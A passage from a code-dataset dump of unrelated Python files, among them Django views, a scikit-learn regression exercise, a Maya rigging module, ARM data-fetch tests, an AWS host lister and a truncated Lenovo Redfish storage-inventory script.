Matrix(matrix.delete(y))\n result.matrix[y][x] = pow(-1, (y + x)) * a_matrix.det()\n\n return result.matrix\n\n # Encuentra la matriz transpuesta\n def transpose(self):\n result = Matrix([[0 for x in range(self.cols)] for y in range(self.rows)])\n for y in range(self.rows):\n for x in range(self.cols):\n result.matrix[x][y] = self.matrix[y][x]\n return result\n\n # Encuentra la inversa de una matriz\n def inv(self):\n result = Matrix([[0 for x in range(self.cols)] for y in range(self.rows)])\n adj = self.transpose().adjunctMatrix()\n det = self.det()\n for y in range(self.rows):\n for x in range(self.cols):\n result.matrix[y][x] = adj[y][x] / det\n\n return result\n\n","sub_path":"libs/zmath.py","file_name":"zmath.py","file_ext":"py","file_size_in_byte":8994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"250869612","text":"from django.shortcuts import render, render_to_response, get_object_or_404\nfrom django.core.mail import send_mail\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic import ListView,DetailView\nfrom django.utils import timezone\nfrom books.models import Book, Author, Publisher\n\n\n# Create your views here.\n\n\ndef display_meta(request):\n values = request.META.items()\n # values.sort()\n return render_to_response('display_meta.html', locals())\n\n# def search_form(request):\n# return render_to_response('search_form.html')\n\n\ndef search(request):\n errors = []\n if 'q' in request.GET:\n q = request.GET['q']\n if not q:\n errors.append('Enter a search term.')\n elif len(q) > 20:\n errors.append('Please enter at most 20 characters.')\n else:\n books = Book.objects.filter(title__icontains=q)\n return render_to_response('search_results.html',\n {'books': books, 'query': q})\n return render_to_response('search_form.html', {'error': errors})\n\n\nclass PublisherList(ListView):\n model = Publisher\n\n\nclass PublisherBookList(ListView):\n template_name = \"books/books_by_publisher.html\"\n\n def get_queryset(self):\n self.publisher = get_object_or_404(Publisher, name=self.args[0])\n return Book.objects.filter(publisher=self.publisher)\n\n def get_context_data(self, **kwargs):\n print(\"self.args[0]=\", self.args[0])\n context = super(PublisherBookList, self).get_context_data(**kwargs)\n context['publisher'] = self.publisher\n return context\n\nclass AuthorDetailView(DetailView):\n queryset = Author.objects.all()\n def get_object(self):\n mobject = super(AuthorDetailView, self).get_object()\n mobject.last_accessed = timezone.now()\n mobject.save()\n return mobject\n\n def get_context_data(self, *args, **kwargs):\n context=super(AuthorDetailView,self).get_context_data(*args,**kwargs)\n mm_object=get_object_or_404(Author,id=self.kwargs['pk'])\n m_object = super(AuthorDetailView,self).get_object()\n context['author']=m_object\n print(context) \n return context","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"525636625","text":"from sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.model_selection import train_test_split\n\n#importing the data set\nwh = pd.read_csv('weatherHistory.csv')\n\n#searching for attributes which have null values\nprint(wh[\"Precip Type\"].isnull().any())\n\n#finding the correlation for better training of the model by selecting the appropriate features\nprint(wh.corr())\n\n#dropping the columns since they have less correlation with target class\nwh = wh.drop(columns=['Summary','Precip Type','Daily Summary' ],axis=1)\n\n#replacing the null values with mean\nwh.select_dtypes(include=[np.number]).interpolate().dropna()\n\n\nX_train, X_test = train_test_split(wh, test_size=0.2)\ny_train=X_train['Temperature (C)']\n\nX_train=X_train.drop(columns=['Temperature (C)'])\ny_test=X_test['Temperature (C)']\nX_test=X_test.drop(columns=['Temperature (C)'])\n\n\n\n#creation of regression model and training it\nreg=LinearRegression().fit(X_train,y_train)\n\n\npred=reg.predict(X_test)\n\n#evaluation of model using metrics\nmean_squared_error = mean_squared_error(y_test, pred)\nr2_score = r2_score(y_test,pred)\nprint(\"mean squared error is :\",mean_squared_error)\nprint(\"r2_score is: \", r2_score)\n","sub_path":"ICP 6/Source/icp6_2.py","file_name":"icp6_2.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"545789213","text":"import os\n\nfrom uitools.qproxy import Q\n\nfrom .exporter import Exporter\n\n\nsettings = {}\n\ndef __before_reload__():\n return settings\n\ndef __after_reload__(state):\n settings.update(state)\n\n\ndef run():\n dialog = Dialog()\n dialog.exec_()\n\n\nclass Dialog(Q.Dialog):\n\n def __init__(self):\n super(Dialog, self).__init__()\n\n self.layout = Q.FormLayout()\n self.setLayout(self.layout)\n\n self.path_layout = Q.HBoxLayout()\n self.layout.addRow(\"Path\", self.path_layout)\n\n self.path_lineedit = Q.LineEdit()\n self.path_lineedit.setMinimumWidth(600)\n self.path_lineedit.setText(settings.get('path') or os.path.expanduser('~/Desktop'))\n self.path_layout.addWidget(self.path_lineedit)\n\n self.path_button = Q.PushButton('Select')\n self.path_layout.addWidget(self.path_button)\n self.path_button.clicked.connect(self.on_path_button)\n\n self.type_combobox = Q.ComboBox()\n self.type_combobox.addItems(['jpg', 'tif', 'png', 'exr'])\n index = self.type_combobox.findText(settings.get('ext', 'jpg'))\n self.type_combobox.setCurrentIndex(index);\n self.layout.addRow(\"Type\", self.type_combobox)\n\n self.export_images_checkbox = Q.CheckBox('Export Images', checked=settings.get('export_images', True))\n self.layout.addRow(\"\", self.export_images_checkbox)\n\n button_layout = Q.HBoxLayout()\n self.layout.addRow(\"\", button_layout)\n self.export_button = Q.PushButton('Export')\n button_layout.addWidget(self.export_button)\n self.export_button.clicked.connect(self.on_export_button)\n\n def on_path_button(self, *args):\n path = Q.FileDialog.getExistingDirectory(\n caption='Select export directory',\n dir=self.path_lineedit.text(),\n )\n if path:\n self.path_lineedit.setText(path)\n\n def on_export_button(self, *args):\n\n settings.clear()\n settings['path'] = self.path_lineedit.text()\n settings['export_images'] = self.export_images_checkbox.isChecked()\n settings['ext'] = self.type_combobox.currentText()\n\n Exporter(**settings).run()\n\n self.hide()\n\n\n\n\n","sub_path":"sitg/mari/exporterui.py","file_name":"exporterui.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278984","text":"#[----------------------] 0%\n#[############----------] 50%\n#[######################] 100%\n# Model\n# - progress\n# - setProgress()\n# View\n# - display()\n# Controller\n# - init\nimport os\n\nclass ProgressModel:\n\tdef __init__(self):\n\t\tself.progress = 0\n\t\t# Complete event callback function\n\t\tself.complete = lambda:x\n\n\tdef icrement(self):\n\t\tif self.progress < 100:\n\t\t\tself.progress += 1\n\t\telse:\n\t\t\tself.complete()\n\nclass ProgressView:\n\tdef clearScreen(self):\n\t\tos.system('cls' if os.name == 'nt' else 'clear')\n\n\tdef display(self,progress):\n\t\tself.clearScreen()\n\t\ttoDisplay = '['\n\t\tfor i in range(50):\n\t\t\tif i < progress//2:\n\t\t\t\ttoDisplay += '#'\n\t\t\telse:\n\t\t\t\ttoDisplay += '-'\n\t\ttoDisplay += '] ' + str(progress) + '%'\n\t\tprint(toDisplay)\n\n\tdef showComplete(self):\n\t\tprint('YAY, We are done')\n\nclass ProgressController:\n\tdef __init__(self):\n\t\tself.running = True\n\t\tself.model = ProgressModel()\n\t\tself.view = ProgressView()\n\t\tself.view.clearScreen()\n\t\tself.model.complete = self.complete\n\t\tself.loop()\n\n\tdef complete(self):\n\t\tself.view.showComplete()\n\t\tself.running = False\n\n\tdef loop(self):\n\t\twhile self.running:\n\t\t\tinput()\n\t\t\tself.model.icrement()\n\t\t\tself.view.display( self.model.progress )\n\n\t\tself.view.showComplete()\n\nprogressBar = ProgressController()\n","sub_path":"week-06/Tibi_progress_bar.py","file_name":"Tibi_progress_bar.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"299538320","text":"# write a function that takes a filename and returns the number of lines the\n# file consists. It should return zero if the file not exists.\n\ndef countLines():\n text = input(\"Which file's lines would you like to count?\")\n count = len(open(text).readlines( ))\n return count\n\nwhile True:\n try:\n print(countLines())\n break\n except IOError:\n print(\"zero\")\n\ncountLines()\n","sub_path":"week-05/day-3/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209751758","text":"\"Module for creating Clavical Rig\"\r\n\r\nimport maya.cmds as mc\r\nfrom RangleRig.toolkit import controlGen\r\nfrom RangleRig.toolkit import assetColourer\r\nfrom RangleRig.toolkit import attrLocker\r\nfrom RangleRig.toolkit import objDefine\r\nfrom RangleRig.toolkit import setDvrKey\r\nfrom RangleRig.toolkit import selectHirearchy\r\n\r\nclass clavGen():\r\n \r\n def __init__(self, basejoint,characterName,rigGrp,visGrp):\r\n \r\n self.setupJnt = basejoint\r\n baseJntslst = selectHirearchy.jntHirearch(basejoint,False)\r\n endSetup = baseJntslst[0]\r\n \r\n ID = mc.getAttr(basejoint +'.UniqueID')\r\n \r\n rigJnts = mc.duplicate(basejoint, name = ID+'_01_Jnt', renameChildren = True)\r\n jnt1 = mc.rename(rigJnts[0], ID + '_01_Jnt')\r\n jnt2 = mc.rename(rigJnts[1], ID + '_02_Jnt')\r\n \r\n #Clavicle Set Up\r\n locX = mc.getAttr(jnt1 + \".translateX\")\r\n\r\n if locX > 0:\r\n assetCol = 6\r\n prefix = \"L_\"\r\n \r\n elif locX < 0:\r\n prefix = \"R_\"\r\n assetCol = 13\r\n \r\n else:\r\n assetCol = 22\r\n prefix = \"M_\"\r\n \r\n mc.setAttr(jnt1 + '.setUpJnt', lock= False)\r\n mc.setAttr(jnt1 + '.UniqueID', lock= False)\r\n mc.setAttr(jnt1 + '.Connect_to', lock= False)\r\n mc.setAttr(jnt1 + '.Connection_type', lock= False)\r\n mc.setAttr(jnt1 + '.characterName', lock= False)\r\n mc.deleteAttr(jnt1 + '.setUpJnt')\r\n mc.deleteAttr(jnt1 + '.characterName')\r\n mc.deleteAttr(jnt1 + '.UniqueID')\r\n mc.deleteAttr(jnt1 + '.Connect_to')\r\n mc.deleteAttr(jnt1 + '.Connection_type')\r\n \r\n clavJnts = mc.listRelatives(jnt1)\r\n baseJnt = mc.rename(jnt1 , prefix +'clavBase_jnt') \r\n self.childJnt = mc.rename(clavJnts[0], prefix +'clavBase_end')\r\n \r\n \r\n \r\n #Create Clavicle Ik\r\n clavIk = mc.ikHandle(startJoint = baseJnt, \r\n endEffector = self.childJnt,\r\n name = prefix +'clavicle_ikhandle')\r\n \r\n \r\n \r\n\r\n \r\n \r\n '''\r\n #ADVANCE CLAVS (WIP)\r\n \r\n mc.distanceDimension( startPoint =[-1,0,0] , endPoint = [1,0,0])\r\n\r\n baseLoc = 'locator1'\r\n childLoc = 'locator2'\r\n \r\n baseLoc = mc.rename(baseLoc, '%sbaseClav_loc' %prefix)\r\n childLoc = mc.rename(childLoc, '%sendClav_loc' %prefix)\r\n \r\n mc.parent(baseLoc, baseJnt)\r\n mc.parent(childLoc, clavIk[0])\r\n \r\n mc.move(0,0,0, baseLoc, objectSpace = True)\r\n mc.move(0,0,0, childLoc, objectSpace = True)\r\n \r\n mc.rename('distanceDimension1', prefix +'clavDist_util')\r\n clavDist = prefix + \"clavDist_utilShape\"\r\n '''\r\n\r\n \r\n #Create Clavicle Controls\r\n self.clavCtrl= controlGen.generateSquare(prefix + \"clavicle_anim\", clavIk[0] ,False)\r\n assetColourer.colourer([self.clavCtrl], assetCol)\r\n \r\n\r\n \r\n #Constrain Ik handle to controler\r\n mc.parent(clavIk[0],self.clavCtrl) \r\n \r\n #Grouping\r\n self.clavGrp = mc.group(empty = True, name = prefix + \"Clav_grp\")\r\n dntGroup= mc.group(empty = True, name = prefix + \"DONOTTOUCH_Clav_grp\")\r\n mc.parent(dntGroup, self.clavGrp)\r\n mc.parent(baseJnt,dntGroup)\r\n mc.parent(self.clavCtrl, self.clavGrp)\r\n \r\n \r\n #Clean Up (Non Joint)\r\n attrLocker.lockCommon(dntGroup,['X','Y','Z'], ['X','Y','Z'], ['X','Y','Z'], True, True)\r\n mc.setAttr(clavIk[0] + '.visibility', 0)\r\n attrLocker.lockCommon(self.clavCtrl,[], [], ['X','Y','Z'], False, True)\r\n \r\n #Clean Up (Joints)\r\n mc.setAttr(self.childJnt +'.drawStyle', 2)\r\n mc.setAttr(baseJnt +'.drawStyle', 2)\r\n \r\n #Clav Vis\r\n mc.select(visGrp)\r\n mc.addAttr( shortName=ID + '_ClavVis', longName=ID + '_ClavVis', attributeType = 'enum', enumName = 'On:Off' , keyable = True, hidden = False )\r\n \r\n for i in [self.clavCtrl]:\r\n setDvrKey.setDvrK(visGrp + '.' + ID + '_ClavVis', i + '.visibility', 0, 1)\r\n setDvrKey.setDvrK(visGrp + '.' + ID + '_ClavVis', i + '.visibility', 1, 0)\r\n\r\n attrLocker.lockCommon(i,[],[],[],True,True)\r\n \r\n \r\n \r\n #Define Controls\r\n objDefine.definer('characterName', [self.clavCtrl], characterName)\r\n objDefine.definer('controlArea', [self.clavCtrl], prefix + \"clav\")\r\n objDefine.definer(\"Connection\", [self.clavGrp], \"root\")\r\n objDefine.definer(\"Connection\", [self.clavCtrl], endSetup )\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n ","sub_path":"RangleRig/rigModules/clavicleRig.py","file_name":"clavicleRig.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"267397405","text":"import inspect\nimport os\n\n\nfrom netCDF4 import Dataset\nimport pandas as pd\nimport pytest\n\n\nfrom solarforecastarbiter.io.fetch import arm\n\n\nTEST_DATA_DIR = os.path.dirname(\n os.path.abspath(inspect.getfile(inspect.currentframe())))\nMET_FILE = os.path.join(TEST_DATA_DIR, 'data',\n 'sgpmetE13.b1.20190122.000000.cdf')\nIRRAD_FILE = os.path.join(TEST_DATA_DIR, 'data',\n 'sgpqcrad1longC1.c1.20190122.000000.cdf')\n\n\ntest_datastreams = ['ds_1', 'ds_2']\nstart_date = pd.Timestamp('2019-01-22')\nend_date = pd.Timestamp('2019-01-23')\n\n\ndef filenames(*args):\n if args[2] == 'ds_1':\n return ['irrad']\n if args[2] == 'ds_2':\n return ['weather']\n return []\n\n\ndef request_file(*args):\n if args[2] == 'irrad':\n return Dataset(IRRAD_FILE)\n if args[2] == 'weather':\n return Dataset(MET_FILE)\n\n\ndef test_format_date():\n date = pd.Timestamp('2019-01-23T01:01:01Z')\n assert arm.format_date(date) == '2019-01-23'\n\n\ndef mocked_request_get_files(*args, **kwargs):\n class Object:\n pass\n response = Object()\n response.text = '{\"files\": [\"filename1\", \"filename2\"]}'\n return response\n\n\n@pytest.fixture\ndef api_key():\n return 'bogus_key'\n\n\n@pytest.fixture\ndef user_id():\n return 'user_id'\n\n\n@pytest.mark.parametrize('stream,variables,start,end', [\n (test_datastreams[0], ['down_short_hemisp',\n 'not_real'], start_date, end_date),\n (test_datastreams[1], ['temp_mean'], start_date,\n end_date),\n])\ndef test_fetch_arm(user_id, api_key, stream, variables, start, end, mocker):\n mocker.patch('solarforecastarbiter.io.fetch.arm.list_arm_filenames',\n side_effect=filenames)\n mocker.patch('solarforecastarbiter.io.fetch.arm.retrieve_arm_dataset',\n side_effect=request_file)\n data = arm.fetch_arm(user_id, api_key, stream, variables, start, end)\n assert variables[0] in data.columns\n\n\n@pytest.mark.parametrize('stream,start,end', [\n ('datastream', start_date, end_date)\n])\ndef test_request_file_lists(user_id, api_key, stream, start, end, mocker):\n mocked_get = mocker.patch('solarforecastarbiter.io.fetch.arm.requests.get',\n side_effect=mocked_request_get_files)\n arm.list_arm_filenames(user_id, api_key, stream, start, end)\n mocked_get.assert_called_with(\n 'https://adc.arm.gov/armlive/data/query',\n params={\n 'user': f'{user_id}:{api_key}',\n 'ds': 'datastream',\n 'start': '2019-01-22',\n 'end': '2019-01-23',\n 'wt': 'json'\n })\n\n\ndef test_request_arm_file(user_id, api_key, mocker):\n mocked_get = mocker.patch('solarforecastarbiter.io.fetch.arm.requests.get')\n arm.request_arm_file(user_id, api_key, 'sgpqcrad1longC1.c1.cdf')\n mocked_get.assert_called_with(\n arm.ARM_FILES_DOWNLOAD_URL,\n params={\n 'user': f'{user_id}:{api_key}',\n 'file': 'sgpqcrad1longC1.c1.cdf',\n },\n stream=True)\n\n\ndef test_extract_arm_variables_exist(mocker):\n nc_file = request_file(None, None, 'irrad')\n extracted = arm.extract_arm_variables(nc_file,\n ['down_short_hemisp', 'nonexistent'])\n assert 'down_short_hemisp' in extracted.columns\n assert 'non-existent' not in extracted.columns\n\n\ndef test_extracted_arm_variables_empty(mocker):\n nc_file = request_file(None, None, 'irrad')\n extracted = arm.extract_arm_variables(nc_file,\n ['no', 'nein', 'ie', 'non'])\n assert extracted.empty\n\n\ndef test_no_files(user_id, api_key, mocker):\n mocker.patch('solarforecastarbiter.io.fetch.arm.list_arm_filenames',\n side_effect=filenames)\n mocker.patch('solarforecastarbiter.io.fetch.arm.retrieve_arm_dataset',\n side_effect=request_file)\n start = end = pd.Timestamp.now()+pd.Timedelta('1 days')\n arm_df = arm.fetch_arm(user_id, api_key, 'ds_no_files',\n ['down_short_hemisp'], start, end)\n assert arm_df.empty\n","sub_path":"solarforecastarbiter/io/fetch/tests/test_arm.py","file_name":"test_arm.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209378656","text":"from django.conf.urls import url\nfrom users import views\n\n\nurlpatterns = [\n\n # 注册\n url(r'^user_register/$', views.user_register, name='user_register'),\n # 登陆\n url(r'^user_login/$', views.user_login, name='user_login'),\n # 退出\n url(r'^user_logout/$', views.user_logout, name='user_logout'),\n # 注册账号激活\n url(r'^user_active/(\\w+)$', views.user_active, name='user_active'),\n # 重置密码邮件验证码\n url(r'^user_forget/$', views.user_forget, name='user_forget'),\n # 重置密码\n url(r'^user_reset/(\\w+)$', views.user_reset, name='user_reset'),\n\n # 个人用户中心-个人资料\n url(r'^user_info/$', views.user_info, name='user_info'),\n # 个人用户中心-个人资料-修改用户头像\n url(r'^user_changeimage/$', views.user_changeimage, name='user_changeimage'),\n # 个人用户中心-个人资料-修改用户信息\n url(r'^user_changeinfo/$', views.user_changeinfo, name='user_changeinfo'),\n # 个人用户中心-个人资料-修改用户邮箱-发送验证码\n url(r'^user_changeemail/$', views.user_changeemail, name='user_changeemail'),\n # 个人用户中心-个人资料-修改用户邮箱-完成\n url(r'^user_resetemail/$', views.user_resetemail, name='user_resetemail'),\n # 个人用户中心-我的课程\n url(r'^user_course/$', views.user_course, name='user_course'),\n # 个人用户中心-我的收藏(机构1)\n url(r'^user_loveorg/$', views.user_loveorg, name='user_loveorg'),\n # 个人用户中心-我的收藏(讲师3)\n url(r'^user_loveteacher/$', views.user_loveteacher, name='user_loveteacher'),\n # 个人用户中心-我的收藏(课程2)\n url(r'^user_lovecourse/$', views.user_lovecourse, name='user_lovecourse'),\n # 个人用户中心-我的消息\n url(r'^user_message/$', views.user_message, name='user_message'),\n # 个人用户中心-我的消息-未读消息变成已读消息\n url(r'^user_deletemessage/$', views.user_deletemessage, name='user_deletemessage'),\n\n]\n","sub_path":"apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"306096920","text":"from src.common.handler import AdminHandler\nimport src.datastore.action as datastore\n\nimport json\n\nclass RegisterApplication(AdminHandler):\n\n def post(self):\n response_data = {\"status\": 200, \"error\": \"\"}\n data = json.loads(self.request.body)\n\n isValid = self.validate(response_data, data)\n if isValid:\n is_actv = True if \"is_actv\" not in data else data[\"is_actv\"].lower() == \"true\"\n is_admn = False if \"is_admn\" not in data else data[\"is_admn\"].lower() == \"true\"\n\n datastore.register_application(data[\"app_id\"], data[\"name\"], data[\"pub_key\"], is_actv, is_admn)\n\n self.response.write(json.dumps(response_data))\n\n def validate(self, response_data, data):\n if \"app_id\" not in data or not data[\"app_id\"]:\n response_data[\"status\"] = 400\n response_data[\"error\"] = \"app_id is required.\"\n return False\n if \"name\" not in data or not data[\"name\"]:\n response_data[\"status\"] = 400\n response_data[\"error\"] = \"name is required.\"\n return False\n if \"pub_key\" not in data or not data[\"pub_key\"]:\n response_data[\"status\"] = 400\n response_data[\"error\"] = \"pub_key is required.\"\n return False\n\n return True\n","sub_path":"src/manager/manager_api.py","file_name":"manager_api.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"390701918","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /Users/silver/Projects/Public/cloud_ssh_config/cloud_ssh_config/cloud/aws.py\n# Compiled at: 2018-10-24 05:58:08\nimport boto3\n\nclass cloud:\n\n def get_hosts(self):\n client = boto3.client('ec2')\n instances = client.describe_instances(Filters=[\n {'Name': 'tag:Name', \n 'Values': [\n '*']},\n {'Name': 'instance-state-name', \n 'Values': [\n 'running']}], MaxResults=100)\n del client\n hosts = {}\n for host in instances['Reservations']:\n if 'PublicIpAddress' in host['Instances'][0]:\n for tag in host['Instances'][0]['Tags']:\n if tag['Key'] == 'Name':\n hosts.update({tag['Value']: host['Instances'][0]['PublicIpAddress']})\n\n return hosts","sub_path":"pycfiles/cloud_storage-1.5.2-py3-none-any/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"196433339","text":"from PyQt5 import QtWidgets\nfrom .framedata import FrameData\nfrom .frameresult import FrameResult\n\nclass FrameMain(QtWidgets.QWidget):\n def __init__(self, parent=None):\n super(FrameMain, self).__init__(parent)\n\n vbox = QtWidgets.QVBoxLayout()\n self.setLayout(vbox)\n\n vbox.addWidget(FrameData())\n vbox.addWidget(FrameResult())\n","sub_path":"gui/frames/framemain.py","file_name":"framemain.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"484855691","text":"def get_next_char(model, initial_text, chars_window, char_to_index, index_to_char):\n \t# Initialize the X vector with zeros\n X = initialize_X(initial_text, chars_window, char_to_index)\n \n # Get next character using the model\n next_char = predict_next_char(model, X, index_to_char)\n\t\n return next_char\n\n# Define context sentence and print the generated text\ninitial_text = \"I am not insane, \"\nprint(\"Next character: {0}\".format(get_next_char(model, initial_text, 20, char_to_index, index_to_char)))\n","sub_path":"Datacamp/Deep Learning for NLP in Python/Recurrent Neural Networks for Language Modeling in Python/chapter-4 ex-3.py","file_name":"chapter-4 ex-3.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"397653129","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n\nNODE_TEMPLATE_SCOPE = 'node_template'\nNODE_TEMPLATE_RELATIONSHIP_SCOPE = 'node_template_relationship'\nOUTPUTS_SCOPE = 'outputs'\n\n\ndef scan_properties(value, handler, scope=None, context=None, path=''):\n \"\"\"\n Scans properties dict recursively and applies the provided handler\n method for each property.\n\n The handler method should have the following signature:\n def handler(dictionary, key, scope, context, value, path):\n\n * dictionary - the dictionary the property belongs to.\n * key - the name of the property.\n * value - the value of the property.\n * scope - scope of the operation (string).\n * context - scanner context (i.e. actual node template).\n * path - current property path.\n\n :param value: The properties container (dict/list).\n :param handler: A method for applying for to each property.\n :param path: The properties base path (for debugging purposes).\n \"\"\"\n if isinstance(value, dict):\n for k, v in value.iteritems():\n current_path = '{0}.{1}'.format(path, k)\n handler(value, k, v, scope, context, current_path)\n scan_properties(v, handler,\n scope=scope,\n context=context,\n path=current_path)\n elif isinstance(value, list):\n for item in value:\n scan_properties(item, handler,\n scope=scope,\n context=context,\n path=path)\n\n\ndef _scan_operations(operations, handler, scope=None, context=None, path=''):\n for name, definition in operations.iteritems():\n if isinstance(definition, dict) and 'properties' in definition:\n scan_properties(definition['properties'],\n handler,\n scope=scope,\n context=context,\n path='{0}.{1}.properties'.format(path, name))\n\n\ndef scan_node_operation_properties(node_template, handler):\n _scan_operations(node_template['operations'],\n handler,\n scope=NODE_TEMPLATE_SCOPE,\n context=node_template,\n path='{0}.operations'.format(node_template['name']))\n for r in node_template.get('relationships', []):\n context = {'node_template': node_template, 'relationship': r}\n _scan_operations(r.get('source_operations', {}),\n handler,\n scope=NODE_TEMPLATE_RELATIONSHIP_SCOPE,\n context=context,\n path='{0}.{1}'.format(node_template['name'],\n r['type']))\n _scan_operations(r.get('target_operations', {}),\n handler,\n scope=NODE_TEMPLATE_RELATIONSHIP_SCOPE,\n context=context,\n path='{0}.{1}'.format(node_template['name'],\n r['type']))\n\n\ndef scan_service_template(plan, handler):\n for node_template in plan.node_templates:\n scan_properties(node_template['properties'],\n handler,\n scope=NODE_TEMPLATE_SCOPE,\n context=node_template,\n path='{0}.properties'.format(\n node_template['name']))\n\n scan_node_operation_properties(node_template, handler)\n for output_name, output in plan.outputs.iteritems():\n scan_properties(output,\n handler,\n scope=OUTPUTS_SCOPE,\n context=plan.outputs,\n path='outputs.{0}'.format(output_name))\n","sub_path":"dsl_parser/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"518358827","text":"###\n#\n# Lenovo Redfish examples - Get the storage information\n#\n# Copyright Notice:\n#\n# Copyright 2018 Lenovo Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n###\n\n\nimport sys\nimport json\nimport redfish\nimport lenovo_utils as utils\n\n\ndef get_storage_info(ip, login_account, login_passwprd, system_id):\n \"\"\"Get storage inventory \n :params ip: BMC IP address\n :type ip: string\n :params login_account: BMC user name\n :type login_account: string\n :params login_password: BMC user password\n :type login_password: string\n :params system_id: ComputerSystem instance id(None: first instance, All: all instances)\n :type system_id: None or string\n :returns: returns storage inventory when succeeded or error message when failed\n \"\"\"\n result = {}\n login_host = \"https://\" + ip\n try:\n # Connect using the BMC address, account name, and password\n # Create a REDFISH object\n REDFISH_OBJ = redfish.redfish_client(base_url=login_host, username=login_account,\n password=login_password, default_prefix='/redfish/v1')\n # Login into the server and create a session\n REDFISH_OBJ.login(auth=\"session\")\n except:\n result = {'ret': False, 'msg': \"Please check the username, password, IP is correct\"}\n return result\n storage_details = []\n # GET the ComputerSystem resource\n system = utils.get_system_url(\"/redfish/v1\", system_id, REDFISH_OBJ)\n if not system:\n result = {'ret': False, 'msg': \"This system id is not exist or system member is None\"}\n REDFISH_OBJ.logout()\n return result\n for i in range(len(system)):\n system_url = system[i]\n response_system_url = REDFISH_OBJ.get(system_url, None)\n if response_system_url.status == 200:\n # GET the Storage resources from the ComputerSystem resource\n if \"Storage\" in response_system_url.dict:\n storage_url = response_system_url.dict[\"Storage\"][\"@odata.id\"]\n else:\n storage_url = response_system_url.dict[\"SimpleStorage\"][\"@odata.id\"]\n response_storage_url = REDFISH_OBJ.get(storage_url, None)\n if response_storage_url.status == 200:\n storage_count = response_storage_url.dict[\"Members@odata.count\"]\n storage = 0\n for nic in range(0, storage_count):\n storage_x_url = response_storage_url.dict[\"Members\"][nic][\"@odata.id\"]\n response_storage_x_url = REDFISH_OBJ.get(storage_x_url, None)\n if response_storage_x_url.status == 200:\n storage = {}\n Storage_id = response_storage_x_url.dict[\"Id\"]\n Name = response_storage_x_url.dict[\"Name\"]\n storage['Id'] = Storage_id\n storage['Name'] = Name\n if \"Devices\" in response_storage_x_url.dict:\n Devices_list = response_storage_x_url.dict['Devices']\n for storage_info in Devices_list:\n Manufacturer = storage_info['Manufacturer']\n Model = storage_info['Model']\n CapacityBytes = storage_info['CapacityBytes']\n Devies_Name = storage_info['Name']\n storage['Manufacturer'] = Manufacturer\n storage['Model'] = Model\n storage['CapacityBytes'] = CapacityBytes\n storage['Devies_Name'] = Devies_Name\n storage_details.append(storage)\n continue\n controller_count = response_storage_x_url.dict[\"StorageControllers@odata.count\"]\n controller = 0\n # GET the StorageControllers instances resources from each of the Storage resources\n storage_list = []\n for controller in range(0, controller_count):\n storage_controller = {}\n Controller = controller\n Manufacturer = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Manufacturer\"]\n Model = response_storage_x_url.dict[\"StorageControllers\"][controller][\"Model\"]\n SerialNumber = response_storage_x_url.dict[\"StorageControllers\"][controller][\"SerialNumber\"]\n FirmwareVersion = response_storage_x_url.dict[\"StorageControllers\"][controller][\n \"FirmwareVersion\"]\n PartNumber = 